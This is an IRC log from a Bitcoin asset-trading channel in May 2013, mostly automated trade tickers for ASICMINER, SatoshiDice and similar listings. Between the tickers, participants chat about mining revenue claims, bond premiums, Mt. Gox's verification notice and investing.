May 30 03:56:59 [HAVELOCK] [ASICM] 43 @ 0.02515 = 1.0815 BTC [-] May 30 03:57:00 [HAVELOCK] [ASICM] 2 @ 0.0251 = 0.0502 BTC [-] May 30 03:57:00 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [-] May 30 03:57:02 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [-] May 30 03:57:03 [HAVELOCK] [ASICM] 37 @ 0.025 = 0.925 BTC [-] May 30 03:57:04 [HAVELOCK] [ASICM] 1 @ 0.02490001 BTC [-] May 30 03:57:05 [HAVELOCK] [ASICM] 4 @ 0.0249 = 0.0996 BTC [-] May 30 03:57:06 [HAVELOCK] [ASICM] 1 @ 0.0249 BTC [-] May 30 03:57:07 [HAVELOCK] [ASICM] 6 @ 0.0249 = 0.1494 BTC [-] May 30 03:57:08 [HAVELOCK] [ASICM] 2 @ 0.0248 = 0.0496 BTC [-] May 30 03:57:59 [HAVELOCK] [ASICM] 3 @ 0.0251996 = 0.0756 BTC [+] May 30 03:58:39 [BTCTC] [ASICMINER-PT] 2 @ 2.548999 = 5.098 BTC [-] May 30 03:59:39 [BTCTC] [BITVPS] 1 @ 0.00067 BTC [+] May 30 04:04:24 who's he ? May 30 04:04:30 [BTCTC] [S.DICE-PT] 1 @ 0.002949 BTC [-] May 30 04:06:17 no clue! May 30 04:07:34 well as long as he got the maff part. May 30 04:07:35 [BTCTC] [PAJKA.BOND] 5 @ 0.1076 = 0.538 BTC [-] May 30 04:07:41 [BTCTC] [PAJKA.BOND] 7 @ 0.1075 = 0.7525 BTC [-] May 30 04:07:48 [BTCTC] [PAJKA.BOND] 9 @ 0.107 = 0.963 BTC [-] May 30 04:09:58 [HAVELOCK] [HIM] 3 @ 2.6515 = 7.9545 BTC [-] May 30 04:10:59 [HAVELOCK] [HIM] 1 @ 2.651 BTC [-] May 30 04:12:19 [BTCTC] [ASICMINER-PT] 1 @ 2.548999 BTC [-] May 30 04:12:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] May 30 04:12:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.024831 BTC [-] May 30 04:13:59 [HAVELOCK] [ASICM] 1 @ 0.02514999 BTC [-] May 30 04:14:59 [HAVELOCK] [ASICM] 1 @ 0.02514999 BTC [-] May 30 04:25:40 [BTCTC] [PAJKA.BOND] 7 @ 0.10999 = 0.7699 BTC [+] May 30 04:26:27 [BTCTC] [PAJKA.BOND] 13 @ 0.109999 = 1.43 BTC [+] May 30 04:28:19 [BTCTC] [PAJKA.BOND] 5 @ 0.109 = 0.545 BTC [-] May 30 04:28:21 [BTCTC] [PAJKA.BOND] 11 @ 0.11 = 1.21 BTC [+] May 30 04:37:07 oh geez May 30 04:37:08 https://bitcointalk.org/index.php?topic=219636.0 May 30 04:37:12 [BTCTC] [BITVPS] 5 @ 0.000677 = 0.0034 BTC [+] May 30 04:37:14 yesterday it was $5m May 30 04:37:22 "AMC Is Again Increasing Its Hash Power To 5.651 TH/s Its Revenue To $8,681,347" May 30 04:37:38 (based on current difficulty, 3mos from now) May 30 04:38:24 ;;nethash May 30 04:38:26 [BTCTC] [BITVPS] 20 @ 0.000678 = 0.0136 BTC [+] May 30 04:38:28 103275.818416 May 30 04:38:31 nice May 30 04:38:31 [BTCTC] [ASICMINER-PT] 1 @ 2.541 BTC [-] May 30 04:38:33 [BTCTC] [ASICMINER-PT] 1 @ 2.54 BTC [-] May 30 04:39:05 [HAVELOCK] [ASICM] 19 @ 0.02515 = 0.4779 BTC [+] May 30 04:39:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.024999 = 0.125 BTC [+] May 30 04:40:03 [BTCTC] [S.DICE-PT] 20 @ 0.002701 = 0.054 BTC [-] May 30 04:40:08 [BTCTC] [S.DICE-PT] 40 @ 0.0027 = 0.108 BTC [-] May 30 04:40:10 [BTCTC] [S.DICE-PT] 7 @ 0.0027 = 0.0189 BTC [-] May 30 04:40:12 [BTCTC] [S.DICE-PT] 100 @ 0.0026 = 0.26 BTC [-] May 30 04:40:14 [BTCTC] [S.DICE-PT] 498 @ 0.002569 = 1.2794 BTC [-] May 30 04:40:52 ThickAsThieves: "should AMC provide the capital in the next few weeks" is creepy May 30 04:40:58 [HAVELOCK] [SDICE] 13 @ 0.2299 = 2.9887 BTC [+] May 30 04:41:11 makes the entire announcement unfalsifiable May 30 04:41:23 it's false either way May 30 04:41:36 no way in hell is he gonna rake in $8m May 30 04:41:47 simple as thatr May 30 04:41:57 [HAVELOCK] [ASICM] 20 @ 0.024661 = 0.4932 BTC [-] May 30 04:41:59 [HAVELOCK] [ASICM] 1 @ 0.02466001 BTC [-] May 30 04:42:00 [HAVELOCK] [ASICM] 1 @ 0.02466001 BTC [-] May 30 04:42:01 [HAVELOCK] [ASICM] 28 @ 0.02466 = 0.6905 BTC [-] May 30 04:42:58 [HAVELOCK] [SDICE] 4 @ 0.23 = 0.92 BTC [+] May 30 04:43:32 lol May 30 04:43:48 why not i ask you. May 30 04:44:05 SDICE really not going so well May 30 04:44:20 Hola May 30 04:44:26 i suppose btc/usd could go way up May 30 04:44:31 and then he could make his $8m May 30 04:44:59 If it could drop more, I'd probably buy a good bunch. May 30 04:45:35 ThickAsThieves: i told him if he makes 10% of what he is claiming, people would still be impressed May 30 04:46:04 hello bitbuyer_m May 30 04:46:54 he stands by the numbers, so, time to get the popcorn May 30 04:46:58 [BTCTC] [S.MPOE-PT] 5 @ 0.00071 = 0.0036 BTC [-] May 30 04:47:33 [MPEX] [S.MPOE] 3489 @ 0.00073011 = 2.5474 BTC [-] May 30 04:47:56 well fi the 100th guy could buy basics then lose his money then buy these etc May 30 04:48:04 why couldn't some other guy get 10mn or w/e May 30 04:48:14 it's a mmorpg after all. May 30 04:48:21 LOL May 30 04:48:31 yeah May 30 04:49:03 ThickAsThieves: "If you make your customers successful, you will be successful" May 30 04:49:09 their tagline is cheesy as fuck May 30 04:49:47 they even have an 800 number May 30 04:49:55 i should give them a call May 30 04:51:14 sounds like a scam May 30 04:54:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.025147 BTC [+] May 30 04:58:02 [BTCTC] [ASICMINER-PT] 1 @ 2.548499 BTC [+] May 30 04:58:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.025149 = 0.1257 BTC [+] May 30 05:05:46 [BTCTC] [ASICMINER-PT] 1 @ 2.529 BTC [-] May 30 05:05:47 [BTCTC] [ASICMINER-PT] 1 @ 2.528 BTC [-] May 30 05:05:49 [BTCTC] [ASICMINER-PT] 1 @ 2.526 BTC [-] May 30 05:05:51 [BTCTC] [ASICMINER-PT] 1 @ 2.524 BTC [-] May 30 05:05:53 [BTCTC] [ASICMINER-PT] 2 @ 2.523 = 5.046 BTC [-] May 30 05:10:30 [BTCTC] [BTC-BOND] 11 @ 0.01044 = 0.1148 BTC [-] May 30 05:10:49 ugh... someone stop buy bonds so high... May 30 05:11:10 That's like 1/2 a year premium May 30 05:11:30 [BTCTC] [ASICMINER-PT] 3 @ 2.538999 = 7.617 BTC [+] May 30 05:12:20 If I then buyback the bonds, people will complain -.- May 30 05:16:43 [BTCTC] [BTC-BOND] 10 @ 0.01 = 0.1 BTC [-] May 30 05:16:48 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [-] May 30 05:16:50 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [-] May 30 05:17:42 http://www.youtube.com/watch?v=rj0L0hcJxPw May 30 05:17:51 jcpham lost the chemtrails May 30 05:18:58 [HAVELOCK] [ASICM] 2 @ 0.025036 = 0.0501 BTC [+] May 30 05:20:58 [HAVELOCK] [ASICM] 33 @ 0.025036 = 0.8262 BTC [+] May 30 05:21:59 [MPEX] [S.MPOE] 741 @ 0.00073084 = 0.5416 BTC [+] May 30 05:22:01 [MPEX] [S.MPOE] 9550 @ 0.0007309 = 6.9801 BTC [+] May 30 05:22:03 [MPEX] [S.MPOE] 1209 @ 0.0007314 = 0.8843 BTC [+] May 30 05:22:09 Namworld: free market :P May 30 05:26:25 Problem is if people pay X premium over face value, and I buyback tomorrow... they'd complain May 30 05:28:29 [BTCTC] [ASICMINER-PT] 1 @ 2.528999 BTC [-] May 30 05:29:14 nobody forced them to buy without reading the terms May 30 05:29:35 dont think its your responsibility to hold their hands May 30 05:30:16 fiat500 me either, but people do have trobule digesting stuff. May 30 05:30:47 you cant even notify everyone globally of this because it would/will affect the share price May 30 05:31:00 then it looks like you were manipulating it to lower your buyback cost May 30 05:31:57 [HAVELOCK] [ASICM] 1 @ 0.0251 BTC [+] May 30 05:32:18 [BTCTC] [S.DICE-PT] 10 @ 0.002939 = 0.0294 BTC [+] May 30 05:33:30 [BTCTC] [GSDPT] 10 @ 0.003448 = 0.0345 BTC [+] May 30 05:35:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.02499 BTC [-] May 30 05:36:16 [BTCTC] [BITVPS] 10 @ 0.000678 = 0.0068 BTC [+] May 30 05:37:19 ThickAsThieves: "I fully disclose that the difficulty may increase or decrease in the future and the projected profit is an estimate." May 30 05:37:49 very nice ;p May 30 05:38:02 [BTCTC] [PAJKA.BOND] 10 @ 0.1035 = 1.035 BTC [-] May 30 05:38:31 [BTCTC] [PAJKA.BOND] 5 @ 0.1035 = 0.5175 BTC [-] May 30 05:39:58 [HAVELOCK] [ASICM] 3 @ 0.0251 = 0.0753 BTC [+] May 30 05:40:33 [BTCTC] [TAT.ASICMINER] 9 @ 0.02499 = 0.2249 BTC [-] May 30 05:42:43 [MPEX] [S.MPOE] 11988 @ 0.0007314 = 8.768 BTC [+] May 30 05:42:46 [MPEX] [S.MPOE] 3012 @ 0.00073163 = 2.2037 BTC [+] May 30 05:43:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] May 30 05:44:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.025 = 0.05 BTC [+] May 30 05:46:17 Is it me or does AM seem to just pick whatever people are guessing the div will be on the forum and pay that May 30 05:46:50 [BTCTC] [TAT.ASICMINER] 4 @ 0.025 = 0.1 BTC [+] May 30 05:46:58 [HAVELOCK] [ASICM] 5 @ 0.02509999 = 0.1255 BTC [-] May 30 05:47:20 LOL May 30 05:47:44 dub: either that or the people on the forums are calculating divs correctly May 30 05:48:09 People know ASICMINER's hashrate, so can easily estimate the divs... May 30 05:48:12 we know what their mining returns are May 30 05:48:22 and we know how much hardware they are selling (at least on the forum) May 30 05:50:39 [BTCTC] [S.DICE-PT] 10 @ 0.002939 = 0.0294 BTC [+] May 30 05:50:41 [BTCTC] [S.DICE-PT] 30 @ 0.00294 = 0.0882 BTC [+] May 30 05:51:53 [BTCTC] [BITVPS] 7 @ 0.000733 = 0.0051 BTC [+] May 30 05:52:28 [BTCTC] [ASICMINER-PT] 1 @ 2.527 BTC [-] May 30 05:56:03 [BTCTC] [PAJKA.BOND] 1 @ 0.11 BTC [+] May 30 05:57:27 -PT divs not out yet eh? May 30 05:57:55 [BTCTC] [TAT.ASICMINER] 20 @ 0.025 = 0.5 BTC [+] May 30 05:58:37 [BTCTC] [TAT.ASICMINER] 4 @ 0.025 = 0.1 BTC [+] May 30 06:02:49 [MPEX] [S.MPOE] 3850 @ 0.00073116 = 2.815 BTC [-] May 30 06:02:51 [MPEX] [S.MPOE] 5959 @ 0.00072798 = 4.338 BTC [-] May 30 06:02:52 [MPEX] [S.MPOE] 1980 @ 0.00072696 = 1.4394 BTC [-] May 30 06:04:06 [BTCTC] [ASICMINER-PT] 1 @ 2.527 BTC [-] **** BEGIN LOGGING AT Thu May 30 12:10:45 2013 May 30 12:12:02 [HAVELOCK] [ASICM] 47 @ 0.02543 = 1.1952 BTC [+] May 30 12:13:01 [HAVELOCK] [ASICM] 28 @ 0.0252 = 0.7056 BTC [-] May 30 12:13:03 [HAVELOCK] [ASICM] 37 @ 0.025001 = 0.925 BTC [-] May 30 12:13:04 [HAVELOCK] [ASICM] 20 @ 0.025 = 0.5 BTC [-] May 30 12:13:05 [HAVELOCK] [ASICM] 160 @ 0.02495 = 3.992 BTC [-] May 30 12:13:06 [HAVELOCK] [ASICM] 2 @ 0.02479999 = 0.0496 BTC [-] May 30 12:17:44 [BTCTC] [TAT.ASICMINER] 36 @ 0.02513 = 0.9047 BTC [-] May 30 12:17:46 [BTCTC] [TAT.ASICMINER] 10 @ 0.025 = 0.25 BTC [-] May 30 12:17:47 [BTCTC] [TAT.ASICMINER] 20 @ 0.025 = 0.5 BTC [-] May 30 12:17:49 [BTCTC] [TAT.ASICMINER] 3 @ 0.02499 = 0.075 BTC [-] May 30 12:17:49 [BTCTC] [TAT.ASICMINER] 8 @ 0.02489 = 0.1991 BTC [-] May 30 12:17:50 [BTCTC] [TAT.ASICMINER] 16 @ 0.024865 = 0.3978 BTC [-] May 30 12:17:52 [BTCTC] [TAT.ASICMINER] 3 @ 0.024865 = 0.0746 BTC [-] May 30 12:17:53 [BTCTC] [TAT.ASICMINER] 51 @ 0.024851 = 1.2674 BTC [-] May 30 12:18:01 [BTCTC] [TAT.ASICMINER] 95 @ 0.02485 = 2.3608 BTC [-] May 30 12:18:29 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [-] May 30 12:25:27 [MPEX] [S.MPOE] 2923 @ 0.00072534 = 2.1202 BTC [-] May 30 12:28:08 [HAVELOCK] [ASICM] 28 @ 0.02486 = 0.6961 BTC [+] May 30 12:30:07 The Associated Press is the latest major news outlet to inform President Obama's Department of Justice that they will not be participating in an off-the-record briefing on how Eric Holder's team deals with journalists who work with leakers. May 30 12:30:14 obama, less and less relevant. May 30 12:30:52 hi all. let's hijack http://www.reddit.com/r/bitcoinstocks May 30 12:31:49 or maybe it would be useful for bitcoin-assets to have own subreddit, what do you think? May 30 12:31:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.02514 BTC [+] May 30 12:32:45 jurov do an estimate of man-hours needed to handle the reddit muppets, May 30 12:32:53 see if paul graham is willing to pay for it. May 30 12:33:01 if not, let him wash his own head with that shithole. May 30 12:33:43 heh May 30 12:34:06 for now i'll try to suggest mpex there, what will come out of it this time May 30 12:34:38 and interesting: http://bitcoinnews.io/dan-kaminsky-predicts-the-end-of-the-current-proof-of-work-function/ May 30 12:35:15 i'll be thankful for anyone to write what they're saying, i have trouble to understand May 30 12:38:09 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [-] May 30 12:38:23 basically the guy who originally discovered the dns hole back in 2008 is saying proof of work is bad, May 30 12:38:29 no arguments presented, just his say so. May 30 12:38:36 i'm unimpressed. May 30 12:40:42 [BTCTC] [S.DICE-PT] 99 @ 0.00289 = 0.2861 BTC [-] May 30 12:40:47 [BTCTC] [ASICMINER-PT] 3 @ 2.4989 = 7.4967 BTC [+] May 30 12:41:49 [BTCTC] [TAT.ASICMINER] 97 @ 0.0251 = 2.4347 BTC [-] May 30 12:41:57 [MPEX] [S.MPOE] 6100 @ 0.00072634 = 4.4307 BTC [+] May 30 12:42:45 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 12:42:47 [BTCTC] [TAT.ASICMINER] 7 @ 0.025099 = 0.1757 BTC [-] May 30 12:47:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.02499 BTC [-] May 30 12:47:33 bleh, even if you make the PoW scrypt with a 8 GB requirement, at some point it's going to be favorable to manufacture asics again May 30 12:47:43 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 12:47:44 and we're right back where we started May 30 12:48:43 [BTCTC] [TAT.ASICMINER] 10 @ 0.02499 = 0.2499 BTC [-] May 30 12:51:11 Scrat moreover, what;s the point he has ? wah wah americanz missed the asic boat the world rules must now be changed ? May 30 12:51:25 tough tits. learn to finance projects that matter rather than projects you "like" May 30 12:52:06 [BTCTC] [BITVPS] 1 @ 0.00072 BTC [-] May 30 12:52:58 [BTCTC] [TAT.ASICMINER] 25 @ 0.024819 = 0.6205 BTC [-] May 30 12:53:00 [BTCTC] [TAT.ASICMINER] 46 @ 0.024818 = 1.1416 BTC [-] May 30 12:53:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.024815 BTC [-] May 30 12:53:03 [BTCTC] [TAT.ASICMINER] 27 @ 0.0248 = 0.6696 BTC [-] May 30 12:53:04 [BTCTC] [TAT.ASICMINER] 55 @ 0.024721 = 1.3597 BTC [-] May 30 12:53:05 [HAVELOCK] [ASICM] 32 @ 0.02487 = 0.7958 BTC [+] May 30 12:53:06 [HAVELOCK] [ASICM] 40 @ 0.02486 = 0.9944 BTC [-] May 30 12:53:07 [BTCTC] [TAT.ASICMINER] 34 @ 0.02472 = 0.8405 BTC [-] May 30 12:53:08 [HAVELOCK] [ASICM] 101 @ 0.0248 = 2.5048 BTC [-] May 30 12:53:09 [HAVELOCK] [ASICM] 2 @ 0.02467001 = 0.0493 BTC [-] May 30 12:53:11 [HAVELOCK] [ASICM] 18 @ 0.02467 = 0.4441 BTC [-] May 30 12:53:12 [HAVELOCK] [ASICM] 1 @ 0.02467 BTC [-] May 30 12:53:13 [HAVELOCK] [ASICM] 50 @ 0.02466001 = 1.233 BTC [-] May 30 12:53:13 [HAVELOCK] [ASICM] 4 @ 0.02464502 = 0.0986 BTC [-] May 30 12:53:14 [HAVELOCK] [ASICM] 2 @ 0.024645 = 0.0493 BTC [-] May 30 12:53:15 [BTCTC] [TAT.ASICMINER] 50 @ 0.02471 = 1.2355 BTC [-] May 30 12:53:17 [BTCTC] [TAT.ASICMINER] 5 @ 0.02471 = 0.1236 BTC [-] May 30 12:53:38 [MPEX] [S.MPOE] 2966 @ 0.00072783 = 2.1587 BTC [+] May 30 12:53:39 [MPEX] [S.MPOE] 5993 @ 0.00072898 = 4.3688 BTC [+] May 30 12:53:42 [MPEX] [S.MPOE] 2241 @ 0.00072982 = 1.6355 BTC [+] May 30 12:54:03 [HAVELOCK] [ASICM] 58 @ 0.024645 = 1.4294 BTC [-] May 30 12:54:04 [HAVELOCK] [ASICM] 1 @ 0.0246 BTC [-] May 30 12:54:58 [BTCTC] [TAT.ASICMINER] 34 @ 0.02498 = 0.8493 BTC [+] May 30 12:57:18 [BTCTC] [ASICMINER-PT] 1 @ 2.485 BTC [+] May 30 12:57:19 [BTCTC] [ASICMINER-PT] 1 @ 2.4803 BTC [-] May 30 12:59:15 mp: hear hear. right now it's 1 kid with asics. hopefully in a few years there are plenty of them. and mining software starts to support the network security features of GBT May 30 12:59:28 because mining pools with 40% of the network = scary May 30 12:59:34 [BTCTC] [ASICMINER-PT] 1 @ 2.477 BTC [-] May 30 12:59:36 [BTCTC] [ASICMINER-PT] 1 @ 2.476001 BTC [-] May 30 12:59:38 [BTCTC] [ASICMINER-PT] 1 @ 2.475991 BTC [-] May 30 12:59:50 [BTCTC] [ASICMINER-PT] 30 @ 2.47599 = 74.2797 BTC [-] May 30 13:00:11 [BTCTC] [ASICMINER-PT] 3 @ 2.475 = 7.425 BTC [-] May 30 13:02:58 [MPEX] [S.MPOE] 5400 @ 0.00072634 = 3.9222 BTC [-] May 30 13:03:02 [BTCTC] [S.BBET-PT] 34 @ 0.002 = 0.068 BTC [+] May 30 13:03:05 [BTCTC] [S.BBET-PT] 1 @ 0.00201 BTC [+] May 30 13:03:07 [BTCTC] [S.BBET-PT] 100 @ 0.0021 = 0.21 BTC [+] May 30 13:03:11 [BTCTC] [S.BBET-PT] 2 @ 0.0021 = 0.0042 BTC [+] May 30 13:03:13 [BTCTC] [S.BBET-PT] 150 @ 0.0022 = 0.33 BTC [+] May 30 13:05:04 [BTCTC] [TAT.ASICMINER] 2 @ 0.024978 = 0.05 BTC [-] May 30 13:06:31 [BTCTC] [ASICMINER-PT] 1 @ 2.493 BTC [+] May 30 13:07:56 how far -will- we crash May 30 13:13:47 haha jurov ws right with said in that quote..people sux May 30 13:14:27 sux donkey dix May 30 13:14:37 lol yeah big dix May 30 13:15:15 so for now, even you, fuck off. i'll be back later mate May 30 13:17:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.02495 = 0.2495 BTC [-] May 30 13:23:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.024949 BTC [-] May 30 13:24:06 [BTCTC] [S.BBET-PT] 1 @ 0.00364 BTC [+] May 30 13:27:47 [BTCTC] [TAT.ASICMINER] 7 @ 0.0249 = 0.1743 BTC [-] May 30 13:28:06 [BTCTC] [TAT.ASICMINER] 4 @ 0.02495 = 0.0998 BTC [+] May 30 13:28:33 [BTCTC] [S.DICE-PT] 4 @ 0.002938 = 0.0118 BTC [+] May 30 13:30:11 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [-] May 30 13:30:58 [BTCTC] [TAT.ASICMINER] 4 @ 0.0249 = 0.0996 BTC [-] May 30 13:37:50 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [-] May 30 13:41:59 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] May 30 13:43:02 [HAVELOCK] [ASICM] 37 @ 0.0249999 = 0.925 BTC [+] May 30 13:46:48 https://mtgox.com/press_release_20130530.html May 30 13:47:03 [HAVELOCK] [ASICM] 37 @ 0.0249999 = 0.925 BTC [+] May 30 13:47:12 "As a result, beginning May 30th, 2013 all Mt. Gox user accounts are required to be verified in order to perform any currency deposits and withdrawals. Bitcoin deposits do not need verification, and at this time we are not requiring verification for Bitcoin withdrawals." May 30 13:47:58 I didn't realize that was something new May 30 13:48:17 maybe they are cleaning up older users that were there before they required verification? May 30 13:51:37 [BTCTC] [BASIC-MINING] 1 @ 0.639999 BTC [+] May 30 13:53:00 [BTCTC] [BASIC-MINING] 1 @ 0.64 BTC [+] May 30 14:03:52 what do you guys think of https://bitfunder.com/asset/Graet.Loan May 30 14:05:17 [BTCTC] [TAT.ASICMINER] 4 @ 0.02488 = 0.0995 BTC [-] May 30 14:06:20 ghost? May 30 14:07:12 why May 30 14:07:34 you mean they will loose marketshare May 30 14:07:51 yeah im sure they will May 30 14:08:10 heh May 30 14:08:41 i didnt sleep either bro May 30 14:08:43 its 7am May 30 14:08:50 im staying up :) May 30 14:09:17 take sleeping pills May 30 14:09:21 go to the doctor May 30 14:09:29 seriously May 30 14:09:38 im going to ask for some May 30 14:09:40 [BTCTC] [ASICMINER-PT] 1 @ 2.489 BTC [-] May 30 14:09:48 alcohol doesnt really work that well May 30 14:11:07 ugh i just came up with an asset idea that might be so good it's embarssing May 30 14:13:07 can't share it May 30 14:13:13 have to just do it i think May 30 14:13:50 i need to vet it a little May 30 14:14:01 but soon if it makes sense May 30 14:14:44 or with anyone that might beat me to it May 30 14:14:55 what is everyone invested in here as far as assets go May 30 14:14:56 ;) May 30 14:15:04 im looking to put some bitcoin in something May 30 14:15:10 in something bitcoin May 30 14:15:14 AM & bonds May 30 14:15:25 asicminer? i feel i missed the boat on that May 30 14:15:34 i'm biased May 30 14:15:42 so you might need to get your assessment elsewhere May 30 14:15:50 but AM at 2.4-2.5 ain't bad imo May 30 14:16:02 heh i was about to buy at 1.39 May 30 14:16:10 then flaked May 30 14:18:34 [BTCTC] [BITVPS] 3 @ 0.00073 = 0.0022 BTC [+] May 30 14:18:47 [BTCTC] [ASICMINER-PT] 1 @ 2.456 BTC [-] May 30 14:19:27 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 14:19:38 [BTCTC] [TAT.ASICMINER] 26 @ 0.02471 = 0.6425 BTC [-] May 30 14:20:00 [MPEX] [S.MPOE] 7906 @ 0.00072534 = 5.7345 BTC [-] May 30 14:20:13 [BTCTC] [ASICMINER-PT] 1 @ 2.4553 BTC [+] May 30 14:20:58 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 14:21:33 [BTCTC] [ASICMINER-PT] 1 @ 2.4553 BTC [+] May 30 14:22:08 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 14:24:10 any silver bugs here? May 30 14:24:15 ive been reading about silver May 30 14:24:50 [BTCTC] [BITVPS] 2 @ 0.00073 = 0.0015 BTC [+] May 30 14:24:57 ehh yeah im going to buy some May 30 14:25:02 you buy coins and bars? May 30 14:26:55 yeah im in canada May 30 14:27:08 seems the prices here for bars n coins are more expensive May 30 14:27:19 i gotta find a good dealer May 30 14:30:22 [BTCTC] [TAT.ASICMINER] 4 @ 0.02484 = 0.0994 BTC [+] May 30 14:32:12 [BTCTC] [TAT.ASICMINER] 13 @ 0.02484 = 0.3229 BTC [+] May 30 14:34:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.02472 = 0.1236 BTC [-] May 30 14:34:41 [BTCTC] [TAT.ASICMINER] 19 @ 0.02471 = 0.4695 BTC [-] May 30 14:34:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.02471 BTC [-] May 30 14:34:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.02466 = 0.074 BTC [-] May 30 14:34:48 [BTCTC] [TAT.ASICMINER] 4 @ 0.02465 = 0.0986 BTC [-] May 30 14:34:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.0246 BTC [-] May 30 14:34:52 [BTCTC] [TAT.ASICMINER] 5 @ 0.02443 = 0.1222 BTC [-] May 30 14:34:53 [BTCTC] [TAT.ASICMINER] 3 @ 0.02442 = 0.0733 BTC [-] May 30 14:34:55 [BTCTC] [TAT.ASICMINER] 3 @ 0.024411 = 0.0732 BTC [-] May 30 14:34:57 [BTCTC] [TAT.ASICMINER] 16 @ 0.02441 = 0.3906 BTC [-] May 30 14:35:55 [BTCTC] [ASICMINER-PT] 1 @ 2.486 BTC [+] May 30 14:37:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.02485 BTC [+] May 30 14:37:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.02485 BTC [+] May 30 14:37:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.02485 BTC [+] May 30 14:38:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.02485 BTC [+] May 30 14:38:29 Chaang-Noi, how many hashes does each COG share represent? May 30 14:40:17 [BTCTC] [TAT.ASICMINER] 3 @ 0.024849 = 0.0745 BTC [-] May 30 14:41:51 [BTCTC] [TAT.ASICMINER] 6 @ 0.024848 = 0.1491 BTC [-] May 30 14:42:22 [BTCTC] [TAT.ASICMINER] 25 @ 0.02485 = 0.6213 BTC [+] May 30 14:42:53 [BTCTC] [TAT.ASICMINER] 9 @ 0.02493 = 0.2244 BTC [+] May 30 14:43:03 word May 30 14:43:23 so no general target, its just a fund to buy hardware where/when it can May 30 14:49:45 [BTCTC] [TAT.ASICMINER] 8 @ 0.024899 = 0.1992 BTC [-] May 30 14:49:49 [MPEX] [S.MPOE] 3400 @ 0.00072871 = 2.4776 BTC [+] May 30 14:49:49 [MPEX] [S.MPOE] 3294 @ 0.00072982 = 2.404 BTC [+] May 30 14:50:45 truff, you didnt know TAT.AM is me? May 30 14:51:33 ASICM is me too May 30 14:51:34 btw May 30 14:56:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.02489 BTC [-] May 30 15:04:30 [BTCTC] [BITVPS] 2 @ 0.00073 = 0.0015 BTC [+] May 30 15:06:22 [BTCTC] [S.DICE-PT] 20 @ 0.002702 = 0.054 BTC [-] May 30 15:06:39 [BTCTC] [ASICMINER-PT] 1 @ 2.486 BTC [+] May 30 15:07:03 [HAVELOCK] [ASICM] 2 @ 0.0249999 = 0.05 BTC [+] May 30 15:07:04 [HAVELOCK] [ASICM] 3 @ 0.025 = 0.075 BTC [+] May 30 15:07:13 [BTCTC] [S.DICE-PT] 19 @ 0.002701 = 0.0513 BTC [-] May 30 15:10:03 [HAVELOCK] [ASICM] 19 @ 0.025 = 0.475 BTC [+] May 30 15:10:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.02489 = 0.2489 BTC [-] May 30 15:13:03 [HAVELOCK] [ASICM] 2 @ 0.025 = 0.05 BTC [+] May 30 15:17:44 [BTCTC] [ASICMINER-PT] 1 @ 2.486 BTC [+] May 30 15:17:51 [MPEX] [S.MPOE] 394 @ 0.00072534 = 0.2858 BTC [-] May 30 15:17:53 [MPEX] [S.MPOE] 7556 @ 0.00072519 = 5.4795 BTC [-] May 30 15:20:14 [BTCTC] [TAT.ASICMINER] 43 @ 0.02489 = 1.0703 BTC [-] May 30 15:20:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.02489 BTC [-] May 30 15:23:28 [BTCTC] [ASICMINER-PT] 1 @ 2.487 BTC [+] May 30 15:24:03 [HAVELOCK] [ASICM] 1 @ 0.0247 BTC [-] May 30 15:24:04 [HAVELOCK] [ASICM] 37 @ 0.024651 = 0.9121 BTC [-] May 30 15:24:05 [HAVELOCK] [ASICM] 1 @ 0.02452072 BTC [-] May 30 15:24:06 [HAVELOCK] [ASICM] 61 @ 0.02430001 = 1.4823 BTC [-] May 30 15:25:26 [BTCTC] [TAT.ASICMINER] 5 @ 0.02489 = 0.1245 BTC [-] May 30 15:26:03 [HAVELOCK] [ASICM] 100 @ 0.02430001 = 2.43 BTC [-] May 30 15:31:28 [BTCTC] [PAJKA.BOND] 7 @ 0.10998 = 0.7699 BTC [+] May 30 15:33:35 [BTCTC] [TAT.ASICMINER] 30 @ 0.02489 = 0.7467 BTC [-] May 30 15:35:32 [BTCTC] [ASICMINER-PT] 6 @ 2.487 = 14.922 BTC [+] May 30 15:36:06 Chaang-Noi you told me you only have 4 btc why do you troll so hard May 30 15:36:14 lol May 30 15:36:30 no he bought since he was 7 May 30 15:36:35 or was it $7 ? May 30 15:37:22 lol https://github.com/brainwallet/brainwallet.github.com/commit/fa41e1a244c5c95ab588c53eae316852996f0da1 May 30 15:37:45 they had xkcd hardwired in code :D May 30 15:38:14 [BTCTC] [TAT.ASICMINER] 19 @ 0.02489 = 0.4729 BTC [-] May 30 15:45:35 [BTCTC] 